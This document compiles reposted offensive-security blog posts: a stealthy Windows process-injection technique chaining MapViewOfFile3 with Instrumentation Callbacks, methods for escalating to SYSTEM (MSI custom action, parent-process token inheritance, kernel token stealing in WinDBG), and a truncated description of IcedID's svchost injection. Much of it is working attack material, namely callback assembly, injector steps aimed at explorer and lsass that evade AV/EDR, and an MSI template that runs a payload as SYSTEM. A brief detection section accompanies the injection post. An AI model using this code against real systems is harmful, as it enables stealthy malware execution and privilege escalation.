Weaponizing Mapping Injection with Instrumentation Callback for stealthier process injection

Original text by splinter_code

Process Injection is a technique to hide code behind benign and/or system processes. This technique is usually used by malwares to gain stealthiness while performing malicious operations on the system. AVs/EDR solutions are aware of this technique and create detection patterns to identify and kill this «class» of attacks.

Nowadays the detection is achieved through multiple ways. The most common is through Userland Hooking. Most of the times, this is achieved by injecting a hooking engine dll directly from the kernel every time a new process is created.

While this kind of detection has been proven that can be bypassed in multiple ways (by remapping DLLs from the disk at runtime or by using direct system calls) there are other effective ways to track the injection behaviors.
For example Sysmon provide a way to track remote thread creations directly from ring 0 and avoids all the problems of monitoring processes from the same ring level of the process itself.

There are also Event Tracing for Windows (ETW) kernel-mode API to add event tracing to kernel-mode drivers where you can register to specific events (for process injection scenario syscalls are of interests) and receive notifications by the kernel directly from ring 0. In latest windows the kernel has been instrumented with new sensors designed to trace User APC code injection initiated by a kernel code and other events to track process injections. There are no public documentation about that, but here you can find an interesting article with some of the events you can register.

With that in mind i wanted to explore if there are other patterns that can be took to perform process injection operations (ideally not well documented nor already known) and check if that can work to bypass some AVs/EDR. The aim is not to criticize the actual detection in place by AVs/EDR, but to give detailed internals on how it works in order to ease (making known what is unknown) the development of effective detection.

So before i jump in the technical deep dive TL;DR section i want to give a little brief of what are you going to read (if you are interested):

I’m going to release and detail a stealthy process injection technique that uses a combination of two functions to achieve allocation primitive (that i have already described some time ago) CreateFileMapping() and MapViewOfFile2() ( well i have made some updates to use a stealthier version called MapViewOfFile3() ) and chain a very powerful execution primitive through the call NtSetInformationProcess().
The last function i mentioned can be used to set an Instrumentation Callback in an arbitrary process. From the attacker perspective this function could be abused and would allow to do a «jmp [0xYourAddress]» directly from the kernel without raising any remote thread creation and neither an APC creation, really stealthy!
It has a drawback, it expect a certain callback with a specific behavior to follow if you don’t want to mess/crash the target process and this is what i will [try to] explain in this post.


While the functions to achieve allocation primitive on the target process have been already described, the main focus of this section will be to detail all the steps needed to comply with the expected behavior for the callback to be used in the NtSetInformationProcess() function.

The starting point will be this post and this presentation where they described this technique for hooking purposes.

The core of this technique is not the syscall NtSetInformationProcess() but the Instrumentation Callback.
The Instrumentation Callback is a field in KPROCESS structure and is set to NULL by default to every process.

How it works?

«Each time the kernel encounters a situation in which it returns to user level code. It checks the InstrumentationCallback member of the current KPROCESS structure under which the processor executes. If it is not NULL and assuming it points to valid memory, the kernel will swap out the RIP on the trap frame and exchange it for the value contained at InstrumentationCallback.» took here

There are many situations in which there is a transition from kernel to user land code. So let’s analyze the function in charge of the swap of RIP.
Reversing ntoskrnl.exe i found the function KiSetupForInstrumentationReturn() that looks promising:

What it does is just checking the InstrumentationCallback field and, if it’s not NULL, it saves the original RIP address (this is the address to restore userland execution) and then changes the KTRAP_FRAME values of RIP to the address contained in the InstrumentationCallback field.
The KTRAP_FRAME are all the data saved before the transition from kernel to user land. And this struct will be used to restore the old data prior to transition when the kernel finishes its job and restore the userland execution.

In other words setting the Instrumentation Callback can trigger your code any time this transition occurs.
But… In the beginning i had 2 points to clarify in order to understand if the callbacks could be abused as an execution primitive for a process injection:

  1. How often this transition happens? Ideally the shellcode shouldn’t take ages to run so we need those transitions happens often in processes (and in this case in the target process).
  2. The InstrumentationCallback is a field of the kernel structure KPROCESS. So we can’t set that directly from a userland process. Is there a way to set it from a userland process? If yes, do we need any particular privilege or precondition?

To clarify the first point i looked at all cross references of the function KiSetupForInstrumentationReturn():

As shown in the above screenshot there are some places where the instrumentation callback triggers. Those triggers happens when the process raise an exception (KiDispatchException) or when an APC get scheduled in the process (KiInitilizeUserApc). Also if those triggers are valid (and useful from a hooking perspective), they are not triggered often enough for our purpose.

But… What about the transition from kernel to user land happening when using syscall? Does this get triggered before the sysret? For sure this is not triggered in the function KiSetupForInstrumentationReturn() showed above,but maybe there is some inline code that does this job.

So let’s investigate KiSystemCall64() call that’s the system service dispatcher function for x64 systems (in other words this is the function in the kernel called after the syscall instruction).

A label of this function caught my attention: KiSystemServiceExit. This is one of the latest operations done before the sysret instruction where all the data are restored from the KTRAP_FRAME.

Disassembling this function i found a really interesting piece of code:

0: kd> uf nt!KiSystemCall64
fffff803`7d9d3d88 488945b0 mov qword ptr [rbp-50h],rax
fffff803`7d9d3d8c e8dfeafeff call nt!KiRestoreDebugRegisterState (fffff803`7d9c2870)
fffff803`7d9d3d91 65488b042588010000 mov rax,qword ptr gs:[188h] ; Get current thread
fffff803`7d9d3d9a 488b80b8000000 mov rax,qword ptr [rax+0B8h] ; Thread->Process
fffff803`7d9d3da1 488b80d0020000 mov rax,qword ptr [rax+2D0h] ; Process->Pcb.InstrumentationCallback
fffff803`7d9d3da8 480bc0 or rax,rax
fffff803`7d9d3dab 7418 je nt!KiSystemServiceExit+0x1a5 (fffff803`7d9d3dc5) ; Jump to SkipCallback code
nt!KiSystemServiceExit+0x18d: ; callback present code
fffff803`7d9d3dad 6683bdf000000033 cmp word ptr [rbp+0F0h],33h ; SegCs
fffff803`7d9d3db5 750e jne nt!KiSystemServiceExit+0x1a5 (fffff803`7d9d3dc5) ; Jump to SkipCallback code
fffff803`7d9d3db7 4c8b95e8000000 mov r10,qword ptr [rbp+0E8h] ; Saves old Rip in R10 -> R10 = ReturnAddressLocal
fffff803`7d9d3dbe 488985e8000000 mov qword ptr [rbp+0E8h],rax ; ReturnAddressLocal = InstrumentationCallback
nt!KiSystemServiceExit+0x1a5: ; SkipCallback code
fffff803`7d9d3dc5 488b45b0 mov rax,qword ptr [rbp-50h]
fffff803`7d9d3dc9 488945b0 mov qword ptr [rbp-50h],rax

view rawKiSystemServiceExit hosted with ❤ by GitHub
The variable ReturnAddressLocal is a local variable initialized to the real return address to userland (this address will point to the address after the syscall instruction in the userland process that is usually a ret instrunction). This address is took from 3rd argument of the KiSystemCall64() function. This piece of code check if the Instrumentation Callback is set and if that’s the case the real address will be saved in R10 and the callback address is stored in the ReturnAddressLocal. Then the ReturnAddressLocal is assigend to KTRAP_FRAME->RIP and when the restoration will occur the redirection of the userland code to the callback address will occurs.

Great! This is a perfect trigger for our process injection 😀

So let’s proceed on the next point i wanted to clarify: How to set this field from a userland process? This can be achieved by calling NtSetInformationProcess() using ProcessInstrumentationCallback (40) as the PROCESS_INFORMATION_CLASS parameter and the structure PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION with some required values. (credits to @aionescu)

There are 2 prerequisites to met:

  1. A process handle with the PROCESS_SET_INFORMATION access is needed;
  2. If a remote process is the target, the SeDebugPrivilege is required. No privileges required if the current process handle is used.

Let’s do something more practical and see how works running a debugging session. I just created a .c source that set its current Instrumentation Callback to a callback that just does «jmp R10» and after that it will call a random syscall (i used NtDelayExecution() in this example) that will trigger our callback.

As you can see in the above debugging session the userland execution after the syscall instruction isn’t restored as usual at next instruction (so at ret instruction) but it jumps to the callback function that, in this case, is just a jump to r10.

Ok, now we know we are able to hijack the execution flow of every syscall of the target process!

But… but… We can’t just allocate our shellcode and run it from the callback address because this would blow up the target process for different reasons (recursions, stack messes, etc…). Effective process injections shouldn’t crash the target process. So, what are all the potential problems causing a crash we should took in consideration?

  1. The callback code must be in charge of saving and restoring RAX (which contains the return value of the syscall) and R10 (needed to restore the execution);
  2. The callback code must be in charge of saving and restoring all the non-volatile registers and the shadow stack space;
  3. The shellcode shouldn’t run any time the syscall is returning to userland, but just 1 time;
  4. The callback code must ensure that the shellcode execution doesn’t create lock conditions while returning the result of the syscall to the caller. So we need to run the shellcode in an async way. This can be achieved running the shellcode in a local thread.
  5. If the callback code calls itself another syscall it should avoids recursions.
  6. Once the shellcode is executed successfully, the callback code will be still placed on the target process. So the callback code must have a way to be turned off.

Let’s write the callback code that manages all the above points, it’s assembly time!

As a starting point i used this public POC available here that managed the first 2 points mentioned above. I will use fasm for assembling and emitting raw shellcode. There are no particular technical reason i preferred it over nasm. I found it cool that it’s entirely written in assembly and can be used to assemble itself. I didn’t use masm because, as far as i know, there are no ways to emit raw assembled code instead of the object files (those are in the .coff format).

The final callback asm code is:

;C:\fasm\fasm.exe callback.asm callback.bin
;python bin2cbuffer.py callback.bin callback
mov rdx, 0x7fffffffffff ; address of the global variable flag to check thread creation
;check if thread never run
cmp byte [rdx], 0
je callback_start
;avoid recursions
jmp restore_execution
;here starts the callback part that runs shellcode, this should run just 1st time
push r10 ; contains old rip to restore execution
push rax ; syscall return value
; why pushing these registers? -> https://docs.microsoft.com/en-us/cpp/build/x64-calling-convention?view=vs-2019#callercallee-saved-registers
push rbx
push rbp
push rdi
push rsi
push rsp
push r12
push r13
push r14
push r15
;shadow space should be 32 bytes + additional function parameters. Must be 32 also if function parameters are less than 4
sub rsp, 32
lea rcx, [shellcode_placeholder] ; address of the shellcode to run
call DisposableHook
;restore stack shadow space
add rsp, 32
;restore nonvolatile registers
pop r15
pop r14
pop r13
pop r12
pop rsp
pop rsi
pop rdi
pop rbp
pop rbx
;restore the return value
pop rax
;restore old rip
pop r10
jmp r10
;source DisposableHook.c -> DisposableHook.msvc.asm
status$ = 96
tHandle$ = 104
objAttr$ = 112
shellcodeAddr$ = 176
threadCreated$ = 184
; 37 : void DisposableHook(LPVOID shellcodeAddr, char *threadCreated) {
mov QWORD [rsp+16], rdx
mov QWORD [rsp+8], rcx
push rdi
sub rsp, 160 ; 000000a0H
; 38 : NTSTATUS status;
; 39 : HANDLE tHandle = NULL;
mov QWORD [rsp+tHandle$], 0
; 40 : OBJECT_ATTRIBUTES objAttr = { sizeof(objAttr) };
mov DWORD [rsp+objAttr$], 48 ; 00000030H
lea rax, QWORD [rsp+objAttr$+8]
mov rdi, rax
xor eax, eax
mov ecx, 40 ; 00000028H
rep stosb
; 43 : *threadCreated = 1; //avoid recursion
mov rax, QWORD [rsp+threadCreated$]
mov BYTE [rax], 1
; 44 : status = NtCreateThreadEx(&tHandle, GENERIC_EXECUTE, &objAttr, (HANDLE)-1, (LPVOID)shellcodeAddr, NULL, FALSE, 0, 0, 0, NULL);
mov QWORD [rsp+80], 0
mov DWORD [rsp+72], 0
mov DWORD [rsp+64], 0
mov DWORD [rsp+56], 0
mov DWORD [rsp+48], 0
mov QWORD [rsp+40], 0
mov rax, QWORD [rsp+shellcodeAddr$]
mov QWORD [rsp+32], rax
mov r9, -1
lea r8, QWORD [rsp+objAttr$]
mov edx, 536870912 ; 20000000H
lea rcx, QWORD [rsp+tHandle$]
call NtCreateThreadEx
mov DWORD [rsp+status$], eax
; 46 : if (status != 0)
cmp DWORD [rsp+status$], 0
je LN2_Disposable
; 47 : *threadCreated = 0; //thread creation failed, reset flag
mov rax, QWORD [rsp+threadCreated$]
mov BYTE [rax], 0
; 53 : }
add rsp, 160 ; 000000a0H
pop rdi
ret 0
mov rax, [gs:60h]
cmp dword [rax+120h], 10240
je build_10240
cmp dword [rax+120h], 10586
je build_10586
cmp dword [rax+120h], 14393
je build_14393
cmp dword [rax+120h], 15063
je build_15063
cmp dword [rax+120h], 16299
je build_16299
cmp dword [rax+120h], 17134
je build_17134
cmp dword [rax+120h], 17763
je build_17763
cmp dword [rax+120h], 18362
je build_18362
cmp dword [rax+120h], 18363
je build_18363
jg build_preview
jmp syscall_unknown
build_10240: ; Windows 10.0.10240 (1507)
mov eax, 00b3h
jmp do_syscall
build_10586: ; Windows 10.0.10586 (1511)
mov eax, 00b4h
jmp do_syscall
build_14393: ; Windows 10.0.14393 (1607)
mov eax, 00b6h
jmp do_syscall
build_15063: ; Windows 10.0.15063 (1703)
mov eax, 00b9h
jmp do_syscall
build_16299: ; Windows 10.0.16299 (1709)
mov eax, 00bah
jmp do_syscall
build_17134: ; Windows 10.0.17134 (1803)
mov eax, 00bbh
jmp do_syscall
build_17763: ; Windows 10.0.17763 (1809)
mov eax, 00bch
jmp do_syscall
build_18362: ; Windows 10.0.18362 (1903)
mov eax, 00bdh
jmp do_syscall
build_18363: ; Windows 10.0.18363 (1909)
mov eax, 00bdh
jmp do_syscall
build_preview: ; Windows Preview
mov eax, 00c1h
jmp do_syscall
mov eax, -1
mov r10, rcx
;from here will be appended the shellcode

view rawcallback.asm hosted with ❤ by GitHub
note: The NtCreateThreadEx function is a slightly modified version took from this nice repo —> SysWhispers

Very briefly, the flag for the callback activation is initialized to 0 (so turned on) and the address that contains this value is moved to rdx. If the callback is turned on it will call the DisposableHook function. This is, as the name suggest, a hook that just run 1 time and then go away (well not always true because it will still persist if the thread creation fails). The DisposableHook function is a function that i wrote with the help of asm generation of visual studio starting from a .c source code:

void DisposableHook(LPVOID shellcodeAddr, char *threadCreated) {
NTSTATUS status;
HANDLE tHandle = NULL;
OBJECT_ATTRIBUTES objAttr = { sizeof(objAttr) };
*threadCreated = 1; //avoid recursion
status = NtCreateThreadEx(&tHandle, GENERIC_EXECUTE, &objAttr, (HANDLE)-1, (LPVOID)shellcodeAddr, NULL, FALSE, 0, 0, 0, NULL);
if (status != 0)
*threadCreated = 0; //thread creation failed, reset flag

view rawDisposableHook.c hosted with ❤ by GitHub
This function take as input the address of the shellcode (that in our case will always be the address of «shellcode_placeholder» label moved in rcx) and the address where is stored the flag to check if the shellcode should still be run (moved in rdx in the beginning of the callback code).
It runs the shellcode in a thread and turn off the callback code by changing the global variable we passed as argument «threadCreated».
The behavior of the callback when is turned off is just jumping to r10.

Now that we have a callback that won’t mess up with the target process, we need to prepare the memory for the execution of the callback in the target process. We need to allocate the memory 2 times in the target process. The first memory space we need is 1 byte RW memory that will be the flag to activate/deactivate the callback function. The second memory space we need is a chunk of memory that will contain the callback code + the shellcode (so RX memory).

Here it comes in the game the Mapping Injection technique to allocate remote memory. The only variation i applied is in using the function MapViewOfFile3() instead of MapViewOfFile2(). MapViewOfFile3() is exported from kernelbase.dll and it is more stealthy because it calls internally NtMapViewOfSectionEx() that has been exported from the kernel starting from Windows 10 build 17134 (version 1803). As it is «quite» recent, many hooking engine just forgot about it and they just place hook on the classic NtMapViewOfSection() that we are avoiding in this technique. For this reason this call will go, most probably, undetected on many hooking engine.

The function in charge of the mapping injection allocation is called MappingInjectionAlloc() with the following code:

LPVOID MappingInjectionAlloc(HANDLE hProc, char* buffer, SIZE_T bufferSize, DWORD protectionType) {
pMapViewOfFile3 MapViewOfFile3 = (pMapViewOfFile3)GetProcAddress(GetModuleHandleW(L»kernelbase.dll»), «MapViewOfFile3»);
if (hFileMap == NULL)
printf(«CreateFileMapping failed with error: %d\n», GetLastError());
LPVOID lpMapAddress = MapViewOfFile3(hFileMap, GetCurrentProcess(), NULL, 0, 0, 0, PAGE_READWRITE, NULL, 0);
if (lpMapAddress == NULL)
printf(«MapViewOfFile failed with error: %d\n», GetLastError());
memcpy((PVOID)lpMapAddress, buffer, bufferSize);
LPVOID lpMapAddressRemote = MapViewOfFile3(hFileMap, hProc, NULL, 0, 0, 0, protectionType, NULL, 0);
if (lpMapAddressRemote == NULL)
printf(«\nMapViewOfFile3 failed with error: %d\n», GetLastError());
return lpMapAddressRemote;

view rawMappingInjectionAlloc.c hosted with ❤ by GitHubNow it’s time to write the injector that will perform the following steps:

  1. Enable the SeDebugPrivilege for the current process (needed for setting the Instrumentation Callback of a remote process);
  2. Find the PID of the target process (i.e. explorer.exe);
  3. Open a handle to that process with the accesses PROCESS_VM_OPERATION (required for MapViewOfFile3) and PROCESS_SET_INFORMATION (required for NtSetInformationProcess)
  4. Allocate 1 byte RW memory (initialized to 0) in the target process that will be used as the flag for activation/deactivation of the callback. This is done through the function MappingInjectionAlloc() that will return the allocation address used in the next step;
  5. Create the final callback by replacing in the callback code the RDX address of the previously allocated flag. Append the required shellcode at the end of the callback code and remotely allocate RX memory in the target process to hold all the final callback code. This is done  through the function MappingInjectionAlloc() that will return the allocation address used in the callback field in the next step;
  6. Assign the address of the remote final callback in the structure PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION;
  7. Call NtSetInformationProcess() with the handle to the target process and with the structure PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION that contains the final callback address in the remote process;
  8. Enjoy your shellcode execution 😀

The shellcode execution is triggered really fast (almost instantly) if you choose a running process that is doing some jobs (i.e. explorer, winlogon, lsass…) because the callback will try to run the shellcode for every syscall execution.

In the end the chain of the api call will be:

OpenProcess() -> (CreateFileMapping() -> MapViewOfFile3() [current process] -> MapViewOfFile3() [target process]) x 2 times -> NtSetInformationProcess()

Let’s test it and spawn a MessageBox in explorer.exe:

You can find the POC code here.


After the shellcode execution occurs this technique will leave some traces behind. The «InstrumentationCallback» field in the KPROCESS structure of the target process will still point to the memroy address of the callback function.

By default, processes have the InstrumentationCallback set to NULL. So this could be used to detect if a process have been injected using this technique.

Assuming you have a memory dump of the machine you can check the KPROCESS of all processes and if the field «InstrumentationCallback» is not NULL you can follow that address and you will probably find the callback code and also the shellcode allocated at the bottom.

Here an example of finding evidence after running the POC targeting the process explorer.exe:

You may be wondering: what if you set the instrumentation callback back to null to avoid detection? Well, this could be possible but this won’t be detailed in this post. What i can say is that it’s not easy at it seems, you can dare to try 😀

That being said this is for sure not a silver bullets for every detection, but it could be used as a generic way to detect the injection, or at least attackers that uses this POC.


The Instrumentation Callback feature is really powerfull either for hooking and code execution. The concept of «DisposableHook» can be used to transform every hooking mechanism in code execution primitive for process injections without messing the target process.

This technique would bypass a plethora of AVs/EDRs because it uses quite uncommon way to perform process injection.
It doesn’t use the prehistoric and classic VirtualAllocEx() and WriteProcessMemory() for allocation primitives and neither the classic CreateRemoteThread() for the execution primitive.

It uses a combination of API calls for allocating remote memory through recently added function for managing section objects. Moreover it doesn’t raise any remote thread or APC thanks to the powerful execution through Instrumentation Callback.

As seen it still leave some traces that could be inspected to detect the injections.

It has some drawbacks: it requires the debug privileges, it works on latest windows and only on x64.

Prevention could be achieved using kernel ETW subscriptions that would allow to detect the remote memory allocation through MapViewOfFile3() (well technically NtMapViewOfSectionEx()) also if direct syscalls are used.

AVs/EDRs solutions that are using kernel ETW subscriptions to monitor syscalls (those allowed by ETW) can make a difference in preventing this technique and many others malicious behaviors due to the fact that those notifications work in a ring level higher than the process itself. 


Alternative methods of becoming SYSTEM

( Original text by XPN )

For many pentesters, Meterpreter’s getsystem command has become the default method of gaining SYSTEM account privileges, but have you ever have wondered just how this works behind the scenes?

In this post I will show the details of how this technique works, and explore a couple of methods which are not quite as popular, but may help evade detection on those tricky redteam engagements.

Meterpreter’s «getsystem»

Most of you will have used the getsystem module in Meterpreter before. For those that haven’t, getsystem is a module offered by the Metasploit-Framework which allows an administrative account to escalate to the local SYSTEM account, usually from local Administrator.

Before continuing we first need to understand a little on how a process can impersonate another user. Impersonation is a useful method provided by Windows in which a process can impersonate another user’s security context. For example, if a process acting as a FTP server allows a user to authenticate and only wants to allow access to files owned by a particular user, the process can impersonate that user account and allow Windows to enforce security.

To facilitate impersonation, Windows exposes numerous native API’s to developers, for example:

  • ImpersonateNamedPipeClient
  • ImpersonateLoggedOnUser
  • ReturnToSelf
  • LogonUser
  • OpenProcessToken

Of these, the ImpersonateNamedPipeClient API call is key to the getsystem module’s functionality, and takes credit for how it achieves its privilege escalation. This API call allows a process to impersonate the access token of another process which connects to a named pipe and performs a write of data to that pipe (that last requirement is important ;). For example, if a process belonging to «victim» connects and writes to a named pipe belonging to «attacker», the attacker can call ImpersonateNamedPipeClient to retrieve an impersonation token belonging to «victim», and therefore impersonate this user. Obviously, this opens up a huge security hole, and for this reason a process must hold the SeImpersonatePrivilege privilege.

This privilege is by default only available to a number of high privileged users:


This does however mean that a local Administrator account can use ImpersonateNamedPipeClient, which is exactly how getsystem works:

  1. getsystem creates a new Windows service, set to run as SYSTEM, which when started connects to a named pipe.
  2. getsystem spawns a process, which creates a named pipe and awaits a connection from the service.
  3. The Windows service is started, causing a connection to be made to the named pipe.
  4. The process receives the connection, and calls ImpersonateNamedPipeClient, resulting in an impersonation token being created for the SYSTEM user.

All that is left to do is to spawn cmd.exe with the newly gathered SYSTEM impersonation token, and we have a SYSTEM privileged process.

To show how this can be achieved outside of the Meterpreter-Framework, I’ve previously released a simple tool which will spawn a SYSTEM shell when executed. This tool follows the same steps as above, and can be found on my github account here.

To see how this works when executed, a demo can be found below:

Now that we have an idea just how getsystem works, let’s look at a few alternative methods which can allow you to grab SYSTEM.

MSIExec method

For anyone unlucky enough to follow me on Twitter, you may have seen my recent tweet about using a .MSI package to spawn a SYSTEM process:

Adam Chester@_xpn_

There is something nice about embedding a Powershell one-liner in a .MSI, nice alternative way to execute as SYSTEM 🙂

This came about after a bit of research into the DOQU 2.0 malware I was doing, in which this APT actor was delivering malware packaged within a MSI file.

It turns out that a benefit of launching your code via an MSI are the SYSTEM privileges that you gain during the install process. To understand how this works, we need to look at WIX Toolset, which is an open source project used to create MSI files from XML build scripts.

The WIX Framework is made up of several tools, but the two that we will focus on are:

  • candle.exe — Takes a .WIX XML file and outputs a .WIXOBJ
  • light.exe — Takes a .WIXOBJ and creates a .MSI

Reviewing the documentation for WIX, we see that custom actions are provided, which give the developer a way to launch scripts and processes during the install process. Within the CustomAction documentation, we see something interesting:


This documents a simple way in which a MSI can be used to launch processes as SYSTEM, by providing a custom action with an Impersonate attribute set to false.

When crafted, our WIX file will look like this:

<?xml version=«1.0«?>
<Wix xmlns=«http://schemas.microsoft.com/wix/2006/wi«>
<Product Id=«*« UpgradeCode=«12345678-1234-1234-1234-111111111111« Name=«Example Product Name« Version=«0.0.1« Manufacturer=«@_xpn_« Language=«1033«>
<Package InstallerVersion=«200« Compressed=«yes« Comments=«Windows Installer Package«/>
<Media Id=«1« Cabinet=«product.cab« EmbedCab=«yes«/>
<Directory Id=«TARGETDIR« Name=«SourceDir«>
<Directory Id=«ProgramFilesFolder«>
<Directory Id=«INSTALLLOCATION« Name=«Example«>
<Component Id=«ApplicationFiles« Guid=«12345678-1234-1234-1234-222222222222«>
<File Id=«ApplicationFile1« Source=«example.exe«/>
<Feature Id=«DefaultFeature« Level=«1«>
<ComponentRef Id=«ApplicationFiles«/>
<CustomAction Id=«SystemShell« Execute=«deferred« Directory=«TARGETDIR« ExeCommand=[cmdline] Return=«ignore« Impersonate=«no«/>
<CustomAction Id=«FailInstall« Execute=«deferred« Script=«vbscript« Return=«check«>
invalid vbs to fail install
<Custom Action=«SystemShell« After=«InstallInitialize«></Custom>
<Custom Action=«FailInstall« Before=«InstallFiles«></Custom>
view rawmsigen.wix hosted with ❤ by GitHub

A lot of this is just boilerplate to generate a MSI, however the parts to note are our custom actions:

<Property Id="cmdline">powershell...</Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>

This custom action is responsible for executing our provided cmdline as SYSTEM (note the Property tag, which is a nice way to get around the length limitation of the ExeCommandattribute for long Powershell commands).

Another trick which is useful is to ensure that the install fails after our command is executed, which will stop the installer from adding a new entry to «Add or Remove Programs» which is shown here by executing invalid VBScript:

<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
  invalid vbs to fail install

Finally, we have our InstallExecuteSequence tag, which is responsible for executing our custom actions in order:

  <Custom Action="SystemShell" After="InstallInitialize"></Custom>
  <Custom Action="FailInstall" Before="InstallFiles"></Custom>

So, when executed:

  1. Our first custom action will be launched, forcing our payload to run as the SYSTEM account.
  2. Our second custom action will be launched, causing some invalid VBScript to be executed and stop the install process with an error.

To compile this into a MSI we save the above contents as a file called «msigen.wix», and use the following commands:

candle.exe msigen.wix
light.exe msigen.wixobj

Finally, execute the MSI file to execute our payload as SYSTEM:



This method of becoming SYSTEM was actually revealed to me via a post from James Forshaw’s walkthrough of how to become «Trusted Installer».

Again, if you listen to my ramblings on Twitter, I recently mentioned this technique a few weeks back:

How this technique works is by leveraging the CreateProcess Win32 API call, and using its support for assigning the parent of a newly spawned process via the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute.

If we review the documentation of this setting, we see the following:


So, this means if we set the parent process of our newly spawned process, we will inherit the process token. This gives us a cool way to grab the SYSTEM account via the process token.

We can create a new process and set the parent with the following code:

int pid;
HANDLE pHandle = NULL;
SIZE_T size;
BOOL ret;

// Set the PID to a SYSTEM process PID
pid = 555;


// Open the process which we will inherit the handle from
if ((pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == 0) {
	printf("Error opening PID %d\n", pid);
	return 2;

ZeroMemory(&si, sizeof(STARTUPINFOEXA));

InitializeProcThreadAttributeList(NULL, 1, 0, &size);
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &pHandle, sizeof(HANDLE), NULL, NULL);

si.StartupInfo.cb = sizeof(STARTUPINFOEXA);

// Finally, create the process
ret = CreateProcessA(

if (ret == false) {
	printf("Error creating new process (%d)\n", GetLastError());
	return 3;

When compiled, we see that we can launch a process and inherit an access token from a parent process running as SYSTEM such as lsass.exe:


The source for this technique can be found here.

Alternatively, NtObjectManager provides a nice easy way to achieve this using Powershell:

New-Win32Process cmd.exe -CreationFlags Newconsole -ParentProcess (Get-NtProcess -Name lsass.exe)

Bonus Round: Getting SYSTEM via the Kernel

OK, so this technique is just a bit of fun, and not something that you are likely to come across in an engagement… but it goes some way to show just how Windows is actually managing process tokens.

Often you will see Windows kernel privilege escalation exploits tamper with a process structure in the kernel address space, with the aim of updating a process token. For example, in the popular MS15-010 privilege escalation exploit (found on exploit-db here), we can see a number of references to manipulating access tokens.

For this analysis, we will be using WinDBG on a Windows 7 x64 virtual machine in which we will be looking to elevate the privileges of our cmd.exe process to SYSTEM by manipulating kernel structures. (I won’t go through how to set up the Kernel debugger connection as this is covered in multiple places for multiple hypervisors.)

Once you have WinDBG connected, we first need to gather information on our running process which we want to elevate to SYSTEM. This can be done using the !process command:

!process 0 0 cmd.exe

Returned we can see some important information about our process, such as the number of open handles, and the process environment block address:

PROCESS fffffa8002edd580
    SessionId: 1  Cid: 0858    Peb: 7fffffd4000  ParentCid: 0578
    DirBase: 09d37000  ObjectTable: fffff8a0012b8ca0  HandleCount:  21.
    Image: cmd.exe

For our purpose, we are interested in the provided PROCESS address (in this example fffffa8002edd580), which is actually a pointer to an EPROCESS structure. The EPROCESSstructure (documented by Microsoft here) holds important information about a process, such as the process ID and references to the process threads.

Amongst the many fields in this structure is a pointer to the process’s access token, defined in a TOKEN structure. To view the contents of the token, we first must calculate the TOKEN address. On Windows 7 x64, the process TOKEN is located at offset 0x208, which differs throughout each version (and potentially service pack) of Windows. We can retrieve the pointer with the following command:

kd> dq fffffa8002edd580+0x208 L1

This returns the token address as follows:

fffffa80`02edd788  fffff8a0`00d76c51

As the token address is referenced within a EX_FAST_REF structure, we must AND the value to gain the true pointer address:

kd> ? fffff8a0`00d76c51 & ffffffff`fffffff0

Evaluate expression: -8108884136880 = fffff8a0`00d76c50

Which means that our true TOKEN address for cmd.exe is at fffff8a000d76c50. Next we can dump out the TOKEN structure members for our process using the following command:

kd> !token fffff8a0`00d76c50

This gives us an idea of the information held by the process token:

User: S-1-5-21-3262056927-4167910718-262487826-1001
User Groups:
 00 S-1-5-21-3262056927-4167910718-262487826-513
    Attributes - Mandatory Default Enabled
 01 S-1-1-0
    Attributes - Mandatory Default Enabled
 02 S-1-5-32-544
    Attributes - DenyOnly
 03 S-1-5-32-545
    Attributes - Mandatory Default Enabled
 04 S-1-5-4
    Attributes - Mandatory Default Enabled
 05 S-1-2-1
    Attributes - Mandatory Default Enabled
 06 S-1-5-11
    Attributes - Mandatory Default Enabled
 07 S-1-5-15
    Attributes - Mandatory Default Enabled
 08 S-1-5-5-0-2917477
    Attributes - Mandatory Default Enabled LogonId
 09 S-1-2-0
    Attributes - Mandatory Default Enabled
 10 S-1-5-64-10
    Attributes - Mandatory Default Enabled
 11 S-1-16-8192
    Attributes - GroupIntegrity GroupIntegrityEnabled
Primary Group: S-1-5-21-3262056927-4167910718-262487826-513
 19 0x000000013 SeShutdownPrivilege               Attributes -
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default
 25 0x000000019 SeUndockPrivilege                 Attributes -
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes -
 34 0x000000022 SeTimeZonePrivilege               Attributes -

So how do we escalate our process to gain SYSTEM access? Well we just steal the token from another SYSTEM privileged process, such as lsass.exe, and splice this into our cmd.exe EPROCESS using the following:

kd> !process 0 0 lsass.exe
kd> !process 0 0 cmd.exe

To see what this looks like when run against a live system, I’ll leave you with a quick demo showing cmd.exe being elevated from a low level user, to SYSTEM privileges:

Interesting technique to inject malicious code into svchost.exe

Once launched, IcedID takes advantage of an interesting technique to inject malicious code into svchost.exe — it does not require starting the target process in a suspended state, and is achieved by only using the following functions:

  • kernel32!CreateProcessA
  • ntdll!ZwAllocateVirtualMemory
  • ntdll!ZwProtectVirtualMemory
  • ntdll!ZwWriteVirtualMemory

IcedID’s code injection into svchost.exe works as follows:

  1. In the memory space of the IcedID process, the function ntdll!ZwCreateUserProcess is hooked.
  2. The function kernel32!CreateProcessA is called to launch svchost.exe and the CREATE_SUSPENDED flag is not set.
  3. The hook onntdll!ZwCreateUserProcess is hit as a result of calling kernel32!CreateProcessA. The hook is then removed, and the actual function call to ntdll!ZwCreateUserProcess is made.
  1. At this point, the malicious process is still in the hook, the svchost.exe process has been loaded into memory by the operating system, but the main thread of svchost.exe has not yet started.
  1. The call to ntdll!ZwCreateUserProcess returns the process handle for svchost.exe. Using the process handle, the functions ntdll!NtAllocateVirtualMemory and ntdll!ZwWriteVirtualMemory can be used to write malicious code to the svchost.exe memory space.
  2. In the svchost.exe memory space, the call to ntdll!RtlExitUserProcess is hooked to jump to the malicious code already written
